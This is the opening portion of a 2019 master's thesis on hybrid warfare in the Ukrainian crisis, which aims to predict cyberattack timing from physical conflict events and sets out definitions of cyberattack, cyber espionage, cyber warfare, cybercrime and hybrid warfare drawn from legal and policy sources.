University of Calgary PRISM: University of Calgary's Digital Repository

Graduate Studies The Vault: Electronic Theses and Dissertations

2019-06-17 Data-Driven Cyber Prediction in Hybrid Warfare

Devereux, Hannah

Devereux, H. (2019). Data-Driven Cyber Prediction in Hybrid Warfare (Unpublished master's thesis). University of Calgary, Calgary, AB. http://hdl.handle.net/1880/110505 master thesis

University of Calgary graduate students retain copyright ownership and moral rights for their thesis. You may use this material in any way that is permitted by the Copyright Act or through licensing that has been assigned to the document. For uses that are not allowable under copyright legislation or licensing, you are required to seek permission. Downloaded from PRISM: https://prism.ucalgary.ca

UNIVERSITY OF CALGARY

Data-driven Cyber Prediction in Hybrid Warfare

by

Hannah Devereux

A THESIS

SUBMITTED TO THE FACULTY OF GRADUATE STUDIES

IN PARTIAL FULFILLMENT OF THE REQUIREMENTS FOR THE

DEGREE OF MASTER OF STRATEGIC STUDIES

GRADUATE PROGRAM IN MILITARY AND STRATEGIC STUDIES

CALGARY, ALBERTA

JUNE, 2019

© Hannah Devereux 2019

ABSTRACT

Hybrid warfare, despite being a thoroughly discussed tactic, is consistently misunderstood and taken out of context. Cyberattacks, most often committed during hybrid warfare, are often studied apart from the physical attributes of war. There is a lack of literature that studies the interplay of cyber and physical attributes within hybrid warfare. By analyzing and assessing the Ukrainian Crisis, this thesis investigates how physical attributes may be used to predict cyberattacks based on real-world data. Using the Axelrod-Iliev equation, the optimal timing of a cyberattack against Ukraine could be determined and, from this, defensive postures could be suggested. To test whether the Axelrod-Iliev equation held true, statistical analysis was used. The statistical analysis verified the findings of the Axelrod-Iliev equation and provided groundwork for future research in the subject area. The statistical analysis found a lack of correlation between Military Personnel/Policemen Killed/Wounded and cyberattacks, Civilians/Politicians Killed/Wounded and cyberattacks, and Protests and cyberattacks. Conversely, it strongly suggested links between Bombings and cyberattacks, and Open Firing and cyberattacks, which can be expounded upon to further understand the interplay of cyber and physical attributes in hybrid warfare.

Keywords: Hybrid warfare, Cyber, Military, Ukraine, Russia, Data Analytics


ACKNOWLEDGEMENTS

I would first like to thank my advisor, Ken Barker, for putting up with my continuously panicked emails that often used no periods or way too many exclamation points. I would not have been able to write this thesis without his guidance, his support and his acceptance of my terrible jokes. Secondly, I would like to extend my gratitude to my colleagues at the Centre for Military, Security and Strategic Studies (CMSS), especially John Reyes, as I may never have switched to writing a thesis without his incessant chanting of “one of us.” I would also like to thank my coworkers and boss at Husky Energy, who have been so understanding of my schooling and my inability to graduate on time. Although they may never read this, I am forever grateful for their support of my thesis over this past year and their willingness to discuss current events in Ukraine with me. Finally, I would like to express my thanks and my love to: my parents, Elyse and Pat, for making sure I stay humble by reminding me of my terrible grades in grade school math; my boyfriend, Patrick, for all of his support through the ups and downs of both life and this paper; and my best friends, Alex, Josie and Vicki, without whom I would have gone insane a long time ago.


GLOSSARY OF TERMS

ATGM- Anti-Tank Guided Missile
ATO Zone- Anti-Terrorist Operation Zone. The parts of Donbas occupied by Russia/pro-Russian separatists.
BE3- BlackEnergy 3
Berkut- Ukrainian Special Forces
C&C- Command and Control Server
CAD- Canadian Dollar
CCCP- See USSR
CERT- Computer Emergency Response Team (Carnegie Mellon)
CVSS- Common Vulnerability Scoring System
DDoS- Distributed Denial of Service
DHS- Department of Homeland Security (United States)
DLL- Dynamic Link Library
DNR- See DPR
DOD- Department of Defense
DoS- Denial of Service
DPR- Donetsk People’s Republic
EU- European Union
FedCIRC- Federal Computer Incident Response Center (United States)
FSB- Federal Security Service of the Russian Federation
FY(year)- Fiscal Year
GLBA- Gramm-Leach-Bliley Act
GRAD- Soviet Truck-mounted 122mm multiple rocket launcher
GRU- Main Directorate of the General Staff of the Armed Forces of the Russian Federation
H.R.- House of Representatives Resolution
HIPAA- Health Insurance Portability and Accountability Act (United States)
HMI- Human User Interface
ICANN- International Corporation for Assigned Names and Numbers
ICS- Industrial Control System
IEC- International Electrotechnical Commission
IOA- Initial Operational Assessment
LNR- See LPR
LOAC- Law of Armed Conflict
LPR- Luhansk People’s Republic
MBR- Master Boot Record
MFT- Managed File Transfer
MLRS- Multiple Launch Rocket System
NATO- North Atlantic Treaty Organization
NBS- National Bureau of Standards (United States)
NCSC- National Computer Security Center (United States)
NIPR- Non-Classified Information Protocol Network
NSA- National Security Agency (United States)
Oblenergos- Ukrainian power distribution companies
OLE- Object Link and Embedding
OPC DA- Open Platform Communication Data Access
OPC- Open Platform Communication
OSCE- Organization for Security and Cooperation in Europe
PfP- Partnership for Peace
PLA- People’s Liberation Army of China
PMESII- Political, Military, Economic, Social, Informational and Infrastructure spectrum
RAT- Remote Access Tool
RTU- Remote Terminal Unit
SBU- Security Services of Ukraine
SFX- Self-Extracting Archives
SIPR- Secret Information Protocol Router Network
SMB- Service Message Block
SMS- text message
TPEP- Trusted Product Evaluation Program (United States)
UAH- Ukrainian Hryvnia
UPS- Uninterruptible Power Supplies
USAF- United States Air Force
US-CERT- United States Computer Incident Response Center
USD- United States Dollar
USSR- United Soviet Socialist Republic
VPN- Virtual Private Network


EPIGRAPH

“Laws and principles are not for the times when there is no temptation: they are for such moments as this, when body and soul rise in mutiny against their rigour ... If at my convenience I might break them, what would be their worth?” -Jane Eyre

“Of course, the fact that States lack definitive guidance on the subject does not relieve them of their obligation to comply with applicable international law in their cyber operations.” -Tallinn Manual on the International Law Applicable to Cyber Warfare, 2013


TABLE OF CONTENTS

1 INTRODUCTION ...... 11
1.1 Background ...... 11
1.2 Thesis Topic ...... 14
1.3 Methodology and Analytical Framework ...... 14
2 DEFINITIONS ...... 18
2.1 Cyberattack ...... 18
2.2 Information Warfare ...... 20
2.3 Cyber ...... 21
2.4 Cyber Warfare ...... 23
2.5 Cybercrime ...... 24
2.6 Hybrid Warfare ...... 25
3 DISTRIBUTION OF CYBER POWER ...... 29
3.1 Infrastructure ...... 30
United States Power ...... 31
Russian Power ...... 33
Ukrainian Power ...... 35
3.2 Legislation ...... 35
United States Legislation ...... 38
Russian Legislation ...... 41
Ukrainian Legislation ...... 42
3.3 Funding ...... 47
United States Funding ...... 47
Russian Funding ...... 48
Ukrainian Funding ...... 48
4 UKRAINIAN CRISIS ...... 52
4.1 Historical Tensions ...... 55
Orange Revolution ...... 56
Yanukovych Wins ...... 59
4.2 Maidan Revolution ...... 59
4.3 Annexation of Crimea ...... 62
4.4 War in Donbas ...... 63
4.5 Cyberattacks against Ukraine ...... 64
Operation Armagedon ...... 66
X-Agent ...... 68
BlackEnergy 3/ Killdisk ...... 71
CrashOverride/Industroyer ...... 74
NotPetya ...... 78
Summary ...... 82
5 DETERMINING OPTIMAL TIMING ...... 83
5.1 The Axelrod-Iliev Model ...... 84
5.2 Applying the Axelrod-Iliev ...... 86
Calculating Persistence (P) ...... 88
Calculating Stealth (S) ...... 90
Calculating Threshold (T) ...... 90
Calculating Discount Rate (w) ...... 91
Applying the Equation to Ukraine Data ...... 91
5.3 Solving for Optimal Timing ...... 93
5.4 Conclusion ...... 95
6 STATISTICAL ANALYSIS ...... 97
6.1 Bombings ...... 102
6.2 Open Firing ...... 108
6.3 Military Personnel and Policemen Killed or Wounded ...... 114
6.4 Civilians and Politicians Killed or Wounded ...... 118
6.5 Protests ...... 122
7 Conclusion ...... 125
8 Bibliography ...... 130


1 INTRODUCTION

1.1 Background

The use of cyber in war is a relatively new concept, and few states have gained prominence in this area of warfare. However, as cyber evolves, so does the need for evolving defensive and offensive tactics within cyber. There is a vast amount of literature discussing different systems to secure data or databases, theoretically analyzing conflict through an international relations or historical perspective and different network defensive structures. However, the interaction between physical security and cyber security is often overlooked as both academic disciplines often remain within their own silos. Thus, there is a gap in the literature surrounding the interplay of physical, or traditional warfare, and cyberattack. While there is expansive literature on hybrid warfare, these works often look at the theoretical notion surrounding hybrid warfare or how hybrid warfare should be defined within the international community, a high-level explanation that often fails to take into account the interplay of cyber and physical on the tactical level.

The Ukrainian Crisis is the case study considered here to answer how cyber defense can be strengthened to assist smaller states with protection against a larger adversary. Ongoing hybrid warfare has become more prominent in the recent decade as the major players in the international system work to assert cyber dominance, moves that have left many smaller states at a disadvantage against cyberattacks. Ukraine has been embroiled in hybrid warfare with Russia since the Maidan Revolution, encompassing the Annexation of Crimea and the current ongoing war in Donbas. The cyber efficiency of the Kremlin is starkly contrasted with the minimal cyber capabilities of Ukraine. The conflict began before Ukraine had infrastructure stable enough to suitably combat cyberattacks; thus, it has consistently struggled to remain ahead of the Russian attacks.

Unlike in traditional warfare, in cyber defense is much more complex and difficult than offense. To attack a network, only one vulnerability must be exploited, one backdoor used, or one phishing email mistakenly opened. Defending a network requires continually testing for vulnerabilities, downloading and installing patches, keeping user training current, and monitoring, detecting and analyzing all traffic that crosses the platform. This is an expensive endeavour in both equipment and manpower, one that many states cannot afford, especially if there are other problems affecting the state. States that cannot afford strong technological defenses are at the mercy of allies or outdated technology for protection.

The background of, and the relationship between, Ukraine and Russia is especially important when evaluating cyberattacks against Ukraine due to the interconnectedness of Russian social and technological systems. Since Ukrainian independence, Ukraine has been in a precarious position between the West and Russia because both aim to monopolize influence over social and governmental spheres. Ukraine, as a former Soviet State, is particularly susceptible to Russian influence as many Ukrainians speak Russian as their first language. Furthermore, there is a firm divide between ethnic Ukrainian and ethnic Russian Ukrainians and their geographical location within Ukraine. Russia has always had influence over Ukrainian technology and infrastructure, and Ukraine has always been subjected to Russian technological dominance. Despite this, Russian cyber aggression spiked during the Maidan Revolution and the subsequent war in Donbas. As the Ukrainian government and the Ukrainian people pivot towards the West, Russia has used hybrid warfare to assure the Kremlin’s continued influence over the state and its people.

While this research is focused on the relationship between Ukraine and Russia, studying cyber and physical attributes together has an impact across all future war. As technologies are increasingly used on the battlefield or against foreign enemies, efforts to understand hybrid warfare from a cyber perspective are critical. A large amount of literature exists around the topic of hybrid warfare, but much of it aims to define hybrid warfare, explain how cyber attributes are a logical step to incorporate into the military sphere (often focusing on how the military is changing to accommodate new technologies), or use strategic studies theories, such as deterrence, to explain the place of cyber in a war.1 Literature not focused on these categories tends to focus on the politics of using hybrid warfare, or technical ways in which hybrid warfare can be used. These tend to be silent on the interplay of the two main aspects of hybrid warfare, namely physical and cyber, as they are primarily interested in the phenomenon itself.2

When specifically looking at cyber capabilities and the possibility of prediction, the majority of work is done from an offensive stance. Often, work from a defensive stance is focused specifically on the securitization of a specific network. Thus, this work mainly focuses on the construction of networks and how to make new technology more secure, rather than working with existing technology or working within the framework of war. For example, Hayden et al. focus on building secure networks and creating paths in data networks that can communicate a lockdown.3 Jabbour and Poisson focus on an analysis of system vulnerability and determining vulnerabilities within the network.4 While there is a small pool of literature that takes a defensive stance to prediction models specifically, this literature generally discounts the existence of physical warfare within hybrid warfare or focuses on network protection outside of an ongoing conflict.

1 See Media Ajir and Bethany Vailliant, “Russian Information Warfare: Implications for Deterrence Theory,” Strategic Studies Quarterly 12, No. 3 (2018): 70-89. AND Tad A. Schnaufer II, “Redefining Hybrid Warfare: Russia’s Non-linear War Against the West,” Journal of Strategic Studies 10, No. 1 (2017): 17-31. AND Bastian Giegerich, “Hybrid Warfare and the Changing Character of Conflict,” Connections: The Quarterly Journal 2 (2016): 65-72.
2 See Yuriy Danyk, Tamara Maliarchuk and Chad Briggs, “Hybrid War: High-tech, Information and Cyber Conflicts,” Connections: The Quarterly Journal 16, No. 2 (2017): 5-24. AND Geoffrey Pridham, “Time to Bolster the Baltic States,” The World Today 71, No. 4 (2015): 40-41. AND Oliver Fitton, “Cyber Operations and Gray Zones: Challenges for NATO,” Connections: The Quarterly Journal 15, No. 2 (2016): 109-119.
3 Patrik M. Hayden, David K. Woolrich and Katherine D. Sobolewski, “Providing Cyber Situational Awareness on Defense Platform Networks,” The Cyber Defense Review 2, No. 2 (2017): 125-140.
4 Dr. Kamal Jabbour and Major Jenny Poisson, “Cyber Risk Assessment in Distributed Information Systems,” The Cyber Defense Review 1, No. 1 (2016): 91-112.

Wu et al. developed a cyberattack prediction model in 2012 that uses Bayesian networks, a graphical statistical model of the conditional dependencies between variables.

1.2 Thesis Topic

This thesis aims to fill a small portion of this gap between cyber and traditional warfare tactics, rather than explaining the theory behind hybrid warfare or aiming to define the international headspace concerning cyberattacks. Thus, the following question is addressed: What is the relationship between cyber attributes and physical attributes in hybrid warfare?

1.3 Methodology and Analytical Framework

The thesis begins with an examination of the literature surrounding cyber and hybrid warfare internationally and is followed by a review of power structures that influence the imbalance of cyber capabilities globally, before focusing specifically on the Ukrainian Crisis as the case study. To analyze the interplay of physical and cyber attributes of the Crisis, we then use a formula created by Axelrod and Iliev to determine the optimal timing of cyberattack. Using the Axelrod-Iliev equation, the Ukrainian Crisis is evaluated to determine if there were discernable trends in physical attributes from 90 days prior, and 90 days following, a significant cyberattack.

First, cyberattacks against Ukraine had to be analyzed and the most pertinent ones were chosen for the research presented in the thesis. Looking at the implications of each attack, how they fall under the Law of Armed Conflict (LOAC) and the nature of each attack, the following five were chosen for analysis: Operation Armagedon, X-Agent, BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya. When calculating the Axelrod-Iliev equation all five were used, as the equation takes into account zero-day exploits and exploits that continuously gather information. Only BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya are used in the statistical analysis because a specific attack date must be determined to facilitate comparison. Since both Operation Armagedon and X-Agent were used over a long period of time to collect sensitive Ukrainian information, they cannot be used to view trends in physical attributes.

The Axelrod-Iliev equation is a mathematical model to “analyze the optimal timing for the use of cyber resources.” This model analyzes the trade-off between waiting to use a resource and the potentiality for that exploit to be discovered and rendered useless. However, the authors acknowledge that the model is “relevant to a defender who wants to estimate how high the stakes have to be in order for the offense to exploit an unknown vulnerability.”5 Unlike the majority of models for cyber prediction, the Axelrod-Iliev equation is based on observable variables and has applications on both the offensive and defensive sides in a conflict.

The equation is originally written to take into account physical attributes of the war, with the heaviest focus on stakes in the conflict – stakes are defined by the authors using a broad example: “In one year you may be at war with the target, making the stakes very high. In another year, you may be at peace, but have just discovered that the target has some new technology you would like to be able to steal, so the stakes would be moderate. In still another year, you may have no problems with the target and the stakes would be low.”6 While this is a broad generalization, the authors argue that the stakes can change in the future, and stakes are unknown.

5 Axelrod, Robert and Rumen Iliev. “Timing of Cyber Conflict” in Proceedings of the National Academy of Sciences of the United States of America 111, no. 4 (January 28, 2014): 1299.
6 Ibid.

In this thesis, the equation uses all stakes (1-6) to determine which level of stake will allow the perpetrator (Russia) to remain in the system for the longest amount of time before the exploit is discovered. The model will use the data from known cyberattacks against Ukrainian infrastructure along with assumptions presented in the Axelrod-Iliev equation. From calculations at different levels of stakes, it is possible to discern for which stakes an attack would be maximally beneficial. From this, a defensive strategy can be formed, based on the knowledge of when the most devastating attack would take place.

Following the calculation of the Axelrod-Iliev equation, we move to statistical data of the Ukrainian Crisis. The data was collected from the website liveuamap.com, which amasses data relevant to the Ukrainian Crisis from government sources, social media, NGO activities and local news sources, among others. This website was chosen as the collection site for data due to its wide range of reporting, corroborating information, inclusion of volunteer armies and non-military battalions operating in eastern Ukraine, and because collection has occurred for a longer time than on other accessible data sources. The Organization for Security and Cooperation in Europe (OSCE) data is perhaps the most accurate, although it does not take into account all data groups we wanted to use for statistical analysis and, early in the collection, is sometimes aggregated over multiple days or weeks and is not consistent in reporting. For these reasons, liveuamap.com is used to collect all data on a day-by-day basis.

1.4 Contributions

Previous research to answer questions concerning hybrid warfare is beyond the scope of our research. Our research provides the groundwork for future work in the area of multi-faceted approaches to understanding hybrid warfare and how the cyber attributes and physical attributes are used in tandem. By choosing to approach the problem through exploratory data, we aim to set the groundwork for future research in this under-investigated area.

First, this research may have implications for hybrid conflicts beyond the Ukrainian Crisis. It has been shown that cyber conflict is most often between states in close geographical proximity, one being the superpower of the region and the other a smaller, satellite state.7 This research can be applied within hybrid conflicts to analyze emerging trends. Second, this research may be further pursued by analyzing the Axelrod-Iliev equation in conjunction with a game-theory approach. This approach treats both sides as actors in the conflict with decision-making abilities, rather than assuming one side is stagnant, only reactive when attacked. Third, the statistical analysis can be used to approach the interplay of cyber and physical attributes in a variety of ways. Using the statistical framework presented in this research, physical attributes of the conflict, beyond what is presented in our research, may be studied to uncover further discernable trends.

7 Brandon Valeriano and Ryan C. Maness, "The Dynamics of Cyber Conflict between Rival Antagonists, 2001-11," Journal of Peace Research 51, no. 3 (2014): 347-360.

2 DEFINITIONS

The legality of cyberattacks is largely determined by the Law of Armed Conflict (LOAC). A lack of stable, agreed-upon definitions in the international community is largely because of the scope for interpretation within LOAC and the complexity of the cyber domain. The international community is divided on what should and should not be explicitly outlined in legislation. This is complicated by the definitions surrounding cyberspace and cyberweapons, as each state wants to gain superiority over others through definitions. Each state can then base its own legislation on its interests and national security concerns. A further incentive for opposing international legislation is the lack of state sovereignty and border control over cyber. Legislation based on territory and territorial control becomes more salient, as arguments can be made to either explain, or explain away, ownership of cyberattacks. Further, for average citizens, terms concerning cyberspace are used interchangeably and inappropriately, especially in the news media, causing confusion and misinformation about cyberspace and its definitions.

Due to the international disharmony surrounding definitions, it is important to define how terms are used within this thesis. Clear distinctions will be made, based on previous academic work and state governmental documents that introduce the following concepts: Cyberattack, Information Warfare, Cyber Espionage, Cyber Warfare, Cybercrime and Hybrid Warfare.

2.1 Cyberattack

The term cyberattack will be used in this thesis as an all-encompassing term for any attack that can be defined as either information warfare, cyber espionage or cyber warfare. A generally accepted definition is: “A cyberattack consists of an action taken to undermine the functions of a computer network for a political or national security purpose.”8 However, under this definition, cyber espionage would not be considered a cyberattack because it does not “involve altering computer networks in a way that affects their current or future ability to function.”9 This definition represents the need for a political motive, but, by removing cyber espionage from the category of cyberattacks, it removes the agency of a state to fund a cyberattack aimed at gathering information from an adversary. Classifying cyber espionage outside of the cyberattack terminology could have serious repercussions when determining what level of retaliatory response is appropriate in the future.10 Further, the discrediting of cyber espionage removes one of the main modes of attack that have happened over networks up to this point.11

The term cyberattack is defined differently in different states, and the definitions of state security strategies should be considered when determining the overarching definition of what constitutes a cyberattack. The North Atlantic Treaty Organization (NATO) defines a cyberattack in the Glossary of Terms and Definitions as “action taken to disrupt, deny, degrade or destroy information resident in a computer and/or computer network, or the computer and/or computer network itself.”12 Canada’s Cyber Security Strategy in 2010 defined cyberattacks to “include the unintentional or unauthorized access, use, manipulation, interruption or destruction (via electronic means) of information and/or the electronic and physical infrastructure used to process, communicate and/or store that information.”13 The Tallinn Manual on the International Law Applicable to Cyber Warfare defines a cyberattack as a “cyber operation, whether offensive or defensive, that is reasonably expected to cause injury or death to persons or damage or destruction to objects.”14 The United States Department of Defense Dictionary of Military and Associated Terms definitions for cyberattack are unclear on distinctions between types of cyberattack, and most definitions are housed within definitions of other domains, such as the use of cyber in maritime warfare.15 However, for the purposes of this thesis, a cyberattack will be defined with the following parameters: (1) an unauthorized action aimed at disrupting, using, manipulating, corrupting, interrupting or destroying information, the computer or computer network(s), through either physical or electronic means; and (2) perpetrated against a state with a political intent or a national security focus.

8 Oona A. Hathaway, Rebecca Crootof, Philip Levitz, Haley Nix, Aileen Nowlan, William Perdue and Julia Spiegel. "The Law of Cyber-Attack." California Law Review 100, No. 4 (2012): 826.
9 Ibid. 825.
10 Joseph S. Nye Jr. “Nuclear Lessons for Cyber Security?” Strategic Studies Quarterly 5, No. 4 (2011): 20.
11 Thomas Rid. “Cyber War Will Not Take Place,” Journal of Strategic Studies 35, No. 1 (2012): 6.
12 AAP-06 Edition 2014. NATO Glossary of Terms and Definitions. NATO Standardization Agency.
13 Canada Use of Force Manual (2008). Use of Force for CF Operations, Canadian Forces Joint Publication. Chief of the Defence Staff, B-GJ-005-501/FP-001, August 2008.

2.2 Information Warfare

Under the umbrella of cyberattack, information warfare is perhaps the most talked about, especially leading up to, and during, the Trump administration. Parameters for defining information warfare are largely pulled from the assertion that “Information Warfare is a subset of Information Operations that is conducted during time of crisis or conflict to achieve or promote specific objectives over a specific adversary or adversaries.”16 In addition, information warfare must happen within the information environment, that is, the environment that encompasses both cyberspace and social networks.17 This means that any attacks against critical infrastructure, or physical attacks that are perpetrated by cyber components, do not fall under the definition of information warfare. In 1996 the RAND Corporation aimed to define the term “strategic information warfare” through the following definition: “Nations utilize cyberspace to affect strategic military operations and inflict damage on national information infrastructures.”18 The United States Air Force, in 2001, defined information warfare as “any action to deny, exploit, corrupt, or destroy the enemy’s information and its functions; protecting ourselves against those actions; and exploiting our own military information functions.”19

14 Tallinn Manual on the International Law Applicable to Cyber Warfare. Rule 30. 2013.
15 United States Department of Defense. United States Department of Defense Dictionary of Military and Associated Terms, February 2018. Washington D.C.: GPO, 2018. http://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/dictionary.pdf
16 Christopher C. Joyner and Catherine Lotrionte. “Information Warfare as International Coercion: Elements of a Legal Framework,” EJIL 12, No. 5 (2001): 825-865, at 826-827.
17 Isaac R. Porche III, Christopher Paul, Michael York, Chad C. Serena, Jerry M. Sollinger, Elliot Axelband, Endy Y. Min and Bruce J. Held. Redefining Information Warfare Boundaries for an Army in a Wireless World. RAND Corporation. 2013. 13.

Using definitions from around the globe has resulted in information warfare being defined through several aspects: (1) it must be carried out by a state against another state; (2) it must be carried out during an ongoing crisis or conflict; and (3) it is confined to the information environment, does not necessarily deal with sensitive information, and does not include attacks where any aspect of the attack is outside of the information sphere.

2.3 Cyber Espionage

Cyber espionage is perhaps the most common of all attacks that cause problems for state infrastructure and stability. Cyber espionage has many different definitions within the international community, although the majority of them are worded similarly, yet remain broad as a way to ensure the right to respond if there were to be an attack that warranted a retaliatory response.20

Internationally, the Tallinn Manual on the International Law Applicable to Cyber Warfare Rule 66 defines cyber espionage as “any act undertaken clandestinely or under false pretenses that uses cyber capabilities to gather information with the intention of communicating it to the opposing party…The act must occur in a territory controlled by a party to the conflict.”21 As with most attacks within the cyber domain, the universal problem of attribution complicates the definition.

18 Roger C. Molander, Andrew S. Riddle and Peter A. Wilson. Strategic Information Warfare: The New Face of Warfare. RAND Corporation. 1996. 1.
19 Joyner and Lotrionte. “Information Warfare as International Coercion,” Supra note 5. 827.
20 See the Austrian Cyber Security Strategy (2013) in which cyber espionage is identified as “cyberattacks directed against the confidentiality of an IT system.” The Cyber Security Strategy for identifies cyber espionage as “an IT attack in cyberspace directed against one or several other IT systems and aimed at damaging IT security, the aims of IT security, confidentiality, integrity and availability may all or individually be compromised.”

Cyber espionage has the following distinctive attributes: (1) it must be carried out against a state by another actor, either state or non-state, for a political or national security purpose; and (2) it must be carried out during an ongoing crisis or conflict. A further point of clarification of the definition of cyber espionage, but one that is not categorically applied, includes attacks against targets in the information sphere to illegally gather sensitive data for malicious use.

Under cyber espionage it is important to acknowledge cyber terrorism as one of its subsets, although some include it with cybercrime because of its position as a criminal act in domestic legislation.22 For the purposes of this thesis cyber terrorism is included under cyber espionage, as the act itself is still fundamentally against a specific state and aimed at coercing the state into a response.23 Cyber terrorism is not considered cyber warfare or cybercrime as it: (1) is perpetrated against civilians, not against legitimate military targets as defined under LOAC; (2) must be used to influence a state’s response; and (3) has computer-based repercussions that exceed physical repercussions. Susan Brenner in 2007 identified three types of cyber terrorism: weapons of mass destruction, weapons of mass distraction, and weapons of mass disruption.24 Each type is used to target and harm civilians, making it fundamentally different from cyber warfare, in which the military is the only lawful target. When a cyber weapon is used in a terrorist attack, it does not mean that the attack is ultimately an act of cyber terrorism, because it must fit the criteria outlined for both cyber terrorism and cyber espionage. For example, if a terrorist group were to hack into a nuclear power plant and cause a nuclear meltdown, this would be classified as a nuclear catastrophe, and a nuclear attack, not cyber terrorism.25

21 Tallinn Manual on the International Law Applicable to Cyber Warfare (2013), Rule 66.
22 “Responding to Terrorism: Crime, Punishment and War,” Harvard Law Review 15, No. 4 (2002): 1217-1238. 1224.
23 Brenner, Susan W. “‘At light speed’: Attribution and response to cybercrime/terrorism/warfare.” The Journal of Criminal Law and Criminology 97, No. 2 (2007): 379-475. 387.
24 Ibid. 390.

2.4 Cyber Warfare

The third and final type of cyberattack is cyber warfare, a term commonly used in the media to explain any classification of cyberattack.26 Cyber warfare can be a problematic concept: a cyber offensive could be responsible for the beginning of a violent chain of events; however, the act itself may not be a violent action, but rather fall into the category of cyber espionage or information warfare.27 Subsequent physical violence is not considered cyber warfare.

Further, this violence does not include economic violence or other non-physical variations of violence as outlined in Article 49 of Additional Protocol I of 1977.28 Only three specific attacks are considered cyber warfare by the Pentagon’s Law of War Manual: “sparking a nuclear plant meltdown, destructively opening a dam above a populated area and causing airplane crashes by disrupting air traffic control.”29 Definitions range from bloodless war to any armed conflict assisted by cyber means, including automated drones and high-tech military equipment, but cyber warfare must “have effects that amplify or are equivalent to major kinetic violence.”30 Cyber warfare, for the purposes of this thesis, must meet the following three criteria: (1) it must be an attack against a state perpetrated by another state, or a state-funded group; (2) it must be an attack that is perpetrated using offensive cyber weapons, and must be kinetic; and (3) it must be designed to cause serious harm to persons or strategic objects with a government or military purpose.31

25 Brenner, “‘At light speed,’” 391.
26 Multiple news outlets use Cyber Warfare as a blanket term, similar to how cyberattack is used in this thesis. For example: The New York Times conglomerates all news relating to Information Warfare, Cyber Espionage and Cyber Crime under the banner of Cyber Warfare (https://www.nytimes.com/topic/subject/cyberwarfare). conglomerates all cyber news under the banner of Cyber Warfare, including new technologies and security, and any cyberattack (https://www.theguardian.com/technology/cyberwar). CNN reports use Cyber Warfare to explain any form of cyberattack, including Cyber Crime, new technologies, physical security breaches that have a cyber component and physical security concerns. See the following for examples: https://www.cnn.com/2018/10/05/opinions/citizens-in-the-crossfire-of-a-cyber-war-opinion-intl/index.html, https://www.cnn.com/2018/05/06/opinions/opinion-andelman/index.html, https://www.cnn.com/2016/09/29/asia/china-cyber-spies-hacking/index.html
27 Thomas Rid, “Cyber War Will Not Take Place,” Journal of Strategic Studies 35, No. 1 (2012): 5-32. 9.
28 International Committee of the Red Cross (ICRC), Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I), 8 June 1977 (Geneva).
29 Hayward, “Evaluating the ‘Imminence’ of a Cyber Attack,” 419.
30 Nye Jr., “Nuclear Lessons for Cyber Security?” 20-21.

2.5 Cybercrime

Cybercrime is not directly relevant to this thesis. However, it is important to define cybercrime to alleviate confusion around the different classifications of attacks within the cyber domain. Cybercrime does not exist under the category of cyberattacks because these crimes are not attacks against a state and have neither a national security nor a political objective. It is perhaps because of the omission of state-focused intent that there is the most international legislation and consensus surrounding protection against cybercrime. Cybercrime can most simply be understood as “the use of computer technology to commit crime; to engage in activity that threatens a society’s ability to maintain internal order.”32 Cybercrime does not have to be for a political motive, nor does it require an attack against a state. The European Council’s Convention on Cybercrime in 2001 aimed to create a “common criminal policy aimed at the protection of society against cybercrime” that specified areas in which domestic laws needed to be adopted.33 However, this treaty let states determine what actions should be in place to protect against cybercrime, which has led to the assumption that cybercrime is “nothing more than the commission of a traditional crime by non-traditional means.”34

31 The definition has been adopted and modified from: Mette Eilstrup-Sangiovanni, “Why the World Needs an International Cyberwar Convention,” Philosophy and Technology (2017). 5.
32 Brenner, “‘At light speed,’” 386.
33 Council of Europe, “Convention on Cybercrime,” European Treaty Series No. 185. Budapest, 2001.
34 Brenner, “‘At light speed,’” 383.

2.6 Hybrid Warfare

A concept commonly associated with cyberattacks, especially cyber warfare, is hybrid warfare, a term indicating a war fought with an array of capabilities including both traditional warfare and cyberattack tactics. This term, like the others, came into use prior to any agreed-upon definition in domestic or international legislation or in the academic literature. While the lack of a definition has less impact on the ability of states to use hybrid warfare, it does complicate the retaliatory response, because ambiguity is embedded within the definition of hybrid warfare. Without international agreement on what constitutes hybrid warfare, domestic governments are free to wage hybrid warfare by walking the thin line between war and espionage while hiding behind technologically veiled attacks and subversion.

Hybrid warfare is not an easy concept to explain, and the distinctions in hybrid warfare are universally contested. As the Multinational Capability Development Campaign Project on Countering Hybrid Warfare so eloquently stated: “the international consensus on hybrid warfare is clear: no one understands it.”35 The Project aims to help delay, deter or resolve hybrid warfare by promoting understanding of hybrid warfare, and offers threat mitigation tactics that reflect the core reasons hybrid warfare is used. First, hybrid warfare “is designed to exploit national vulnerabilities across the political, military, economic, social, informational and infrastructure (PMESII) spectrum” to change the balance of power in favor of the attacking state across one or all of the categories in the PMESII spectrum.36 Second, hybrid warfare “uses coordinated military, political, economic, civilian and information instruments of power that extend far beyond the military realm” but can be used to achieve a shift in power similar to that of a military goal.37 Third, attacks considered to be hybrid warfare are “synchronized and systematic,” using more than one of the categories in the PMESII spectrum.38 Finally, hybrid warfare, no matter what cyber tactics are used, is an international issue that must have legislation at the international level to combat the hybrid threat.39 The overarching description created from this project is “the synchronized use of multiple instruments of power tailored to specific vulnerabilities across the full spectrum of societal functions to achieve synergistic effects.”40 The authors consider this a description rather than a definition, due to the difficulty of agreeing on a common definition.41

35 Multinational Capability Development Campaign, “Defining Hybrid Warfare,” Countering Hybrid Warfare Project (January 2017). 3.
36 Ibid. 4.

Definitions are a key part of international legislation and cooperation around hybrid threats, especially cyberattacks, and, more often than not, states use ambiguous definitions to their advantage. The majority of states define hybrid warfare so that it can be used against other states but responded to when used against their own state. Russian legislation changes in 2014 considered all cyberattacks a variant of information warfare, opening more methods of attack under the umbrella of hybrid warfare for the Kremlin to use offensively.42 This recent change in legislation only makes the actions of the state more defensible when analyzing domestic literature. Until there is an overarching definition, with strict legislation in place, agreed upon at an international level, there is unlikely to be any reduction in the number and severity of cyberattacks used in hybrid warfare. Although the topic is more prevalent and pervasive today, some forms of hybrid war, albeit without the technological advances of today, have always existed, and it is not a new tactic or invention by the current Russian government.43

37 Multinational Capability Development Campaign, “Defining Hybrid Warfare,” 8.
38 Ibid. 4.
39 Ibid. 4.
40 Ibid. 8.
41 Ibid. 8. Supra note 2.
42 Michael Connell and Sarah Vogler, “Russia’s Approach to Cyber Warfare,” CNA Occasional Paper Series, Naval Academy, 24 March 2017.

